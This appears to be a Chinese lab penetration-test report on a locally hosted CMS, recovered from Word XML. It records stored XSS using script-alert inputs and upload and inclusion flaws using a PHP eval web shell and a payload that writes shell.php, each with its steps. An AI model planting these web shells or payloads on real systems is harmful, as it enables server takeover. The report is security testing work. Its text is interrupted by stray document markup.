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一、信息收集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1.用burpsuite进行扫描：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02514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对扫描结果进行分析，从中得到漏洞信息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爬取网站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三、自动化攻击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手工测试，发现漏洞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漏洞一：xss漏洞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测试位置：后台-&gt;本地新闻-&gt;新闻分类管理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操作：点击添加栏目，在分类名称处填入&lt;script&gt;alert(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)&lt;/script&gt;，点击提交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结果：提交完成，页面弹出写有css的弹窗。证明存在xss漏洞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注：在后台所有的添加栏目选项内进行添加操作，都可以实现xss攻击。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9865" cy="230251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0269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漏洞二：xss漏洞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测试位置：后台-&gt;分类信息-&gt;栏目列表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操作：点击添加栏目，在分类名称处填入&lt;script&gt;alert(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)&lt;/script&gt;，点击提交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结果：提交完成，页面弹出写有css的弹窗。证明存在xss漏洞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15540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55545"/>
            <wp:effectExtent l="0" t="0" r="698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漏洞三：xss漏洞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测试位置：后台-&gt;模块管理-&gt;电话广告位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操作：点击添加栏目，在显示名称处填入&lt;script&gt;alert(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)&lt;/script&gt;，点击提交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结果：提交完成，页面弹出写有css的弹窗。证明存在xss漏洞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8194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37130"/>
            <wp:effectExtent l="0" t="0" r="381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漏洞四：文件上传漏洞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测试位置：前台-&gt;个人资料-&gt;用户管理-&gt;我的个人资料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操作：在上传头像处处上传带有恶意代码（ &lt;?php @eval($_POST['pass']);?&gt;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）的图片Hack.jpg（Hack.php+demo.jpg），查询图片存储名，通过路径http://localhost:8082/index.php?test=./data/ </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>16068929703.jpg访问图片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结果：提交完成，访问图片成功，显示此页面。证明存在文件上传漏洞。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2694305"/>
            <wp:effectExtent l="0" t="0" r="1143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771140"/>
            <wp:effectExtent l="0" t="0" r="190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漏洞五：文件上传漏洞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测试位置：后台-&gt;模块管理-&gt;友情链接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操作：点击添加新链接，在上传logo处上传带有恶意代码（ &lt;?php @eval($_POST['pass']);?&gt;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）的图片Hack.jpg（Hack.php+demo.jpg），查询图片存储名，通过路径http://localhost:8082/admin/index.php/data/upload/linklogo/16068952755.jpg访问图片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结果：提交完成，访问图片成功，显示页面。证明存在文件上传漏洞。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558415"/>
            <wp:effectExtent l="0" t="0" r="146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515235"/>
            <wp:effectExtent l="0" t="0" r="635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漏洞六：文件包含漏洞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测试位置：后台-&gt;模块管理-&gt;友情链接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操作：点击添加新链接，在上传logo处上传带有恶意代码（ &lt;?fputs(fopen("shell.php","w"), "&lt;?php phpinfo()?&gt;")?）的图片Hack.jpg（Hack.php+demo.jpg），查询图片存储名，通过路径http://localhost:8082/admin/index.php/data/upload/linklogo/16068952755.jpg访问图片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结果：提交完成，访问图片成功，显示页面。证明存在文件上传漏洞。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47925"/>
            <wp:effectExtent l="0" t="0" r="190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BE9E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1A3EBE9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6F9063"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2A6F90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6EA1C5"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6B6EA1C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A37AA"/>
    <w:rsid w:val="4FB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最美的倪</dc:creator>
  <cp:lastModifiedBy>留火</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-02T09:47:22Z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